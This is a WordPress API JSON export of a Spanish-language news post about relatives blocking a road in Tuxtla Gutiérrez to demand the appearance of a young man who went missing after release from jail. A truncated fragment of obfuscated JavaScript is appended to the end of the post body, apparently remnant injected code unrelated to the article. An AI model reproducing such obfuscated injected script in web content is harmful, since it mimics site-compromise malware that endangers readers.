{"id":9776,"date":"2023-04-27T05:22:58","date_gmt":"2023-04-27T05:22:58","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9776"},"modified":"2023-04-27T05:22:59","modified_gmt":"2023-04-27T05:22:59","slug":"bloquean-vialidad-para-exigir-la-aparicion-del-joven-cristian-de-jesus-hernandez-jimenez","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9776","title":{"rendered":"Bloquean vialidad para exigir la aparici\u00f3n del joven Cristi\u00e1n de Jes\u00fas Hern\u00e1ndez Jim\u00e9nez"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"405\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1682572753019.jpg\" alt=\"\" class=\"wp-image-9777\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1682572753019.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1682572753019-300x169.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 26 de abril del 2023. Tuxtla Guti\u00e9rrez.- Decenas de familiares, amigos y conocidos del joven Cristian de Jes\u00fas Hern\u00e1ndez Jim\u00e9nez de 28 a\u00f1os de edad desaparecido de forma misteriosa tras haber sido recluido en &#8220;La Popular&#8221; en Tuxtla Guti\u00e9rrez, realizaron una protesta y bloqueo en el Libramiento Sur este mi\u00e9rcoles por la noche por m\u00e1s de dos horas.<\/p>\n\n\n\n<p>Este grupo de personas lleg\u00f3 a la altura de la Segunda Oriente donde sacaron lonas y pancartas adem\u00e1s de bloquear el tr\u00e1fico veh\u00edcular.<\/p>\n\n\n\n<p>En este lugar, Anah\u00ed Victoria P\u00e9rez Montejo, inform\u00f3 que su esposo fue detenido el pasado 17 de marzo junto con un acompa\u00f1ante por elementos de la polic\u00eda por alterar el orden p\u00fablico y llevado a la Popular.<\/p>\n\n\n\n<p>De acuerdo con su c\u00f3nyuge, Cristi\u00e1n estuvo detenido desde las tres de la ma\u00f1ana y fue un familiar de su acompa\u00f1ante lleg\u00f3 para sacarlos y fue notificado de que ya hab\u00edan pagado la multa y hab\u00edan salido de la prisi\u00f3n preventiva.<\/p>\n\n\n\n<p>Desde ese momento no se volvi\u00f3 a saber de ambos, algunos testigos refieren que fueron llevados a bordo de un camioneta blanca con rumbo desconocido.<\/p>\n\n\n\n<p>Los familiares relataron que Cristi\u00e1n es de Tez blanca, delgado, cabello negro corto, ojos caf\u00e9s oscuros, boca mediana, nariz mediana aguile\u00f1a, de 1.60 de estatura, y peso de 66 kilos.<\/p>\n\n\n\n<p>Tiene un tatuaje en el brazo izquierdo con el nombre de Karime, en el brazo derecho una rosa, un rosario en la mu\u00f1eca, en la mano una oja de marihuana, los nombres Abril y Karime y la palabra Regae<\/p>\n\n\n\n<p>Adem\u00e1s en ambos hombros, una calavera, con sombrero, y dos estrellas, una cicatriz en el lado izquierdo de la frente.<\/p>\n\n\n\n<p>Los manifestantes permanecieron bloqueando, hasta que personal de la Secretar\u00eda de Gobierno lleg\u00f3 a dialogar con la familia y asegurarles que, el caso ser\u00eda atendido.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 26 de abril del 2023. Tuxtla Guti\u00e9rrez.- Decenas de familiares, amigos y conocidos del joven Cristian de Jes\u00fas Hern\u00e1ndez Jim\u00e9nez de 28 a\u00f1os de edad desaparecido de forma misteriosa tras haber sido recluido en &#8220;La Popular&#8221; en Tuxtla Guti\u00e9rrez, realizaron una protesta y bloqueo en el Libramiento Sur este mi\u00e9rcoles por &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9777,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-9776","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9776","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9776"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9776\/revisions"}],"predecessor-version":[{"id":9778,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9776\/revisions\/9778"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9777"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9776"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9776"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9776"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}